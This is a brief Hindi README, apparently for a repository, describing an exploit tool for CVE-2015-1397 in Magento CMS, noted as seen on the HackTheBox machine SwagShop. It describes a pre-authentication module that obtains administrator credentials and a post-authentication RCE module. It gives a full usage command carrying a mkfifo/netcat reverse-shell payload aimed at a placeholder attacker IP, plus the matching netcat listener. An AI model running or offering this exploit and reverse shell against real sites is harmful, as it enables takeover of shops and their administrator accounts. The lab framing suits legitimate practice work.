
Magento CMS में CVE-2015-1397 के लिए शोषण स्क्रिप्ट, जिसमें व्यवस्थापक क्रेडेंशियल प्राप्त करने के लिए प्री-ऑथ शोषण और रिवर्स शेल निष्पादन के लिए पोस्ट-ऑथ RCE मॉड्यूल शामिल है।
HackTheBox - SwagShop में देखी गई भेद्यता
Magento CMS डैशबोर्ड के लिए एडमिनिस्ट्रेटर क्रेडेंशियल प्राप्त करें
exploit.py से प्राप्त क्रेडेंशियल्स को post_auth.py में जोड़कर यह चलाएँ:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
लिसनर:
nc -lvnp 4444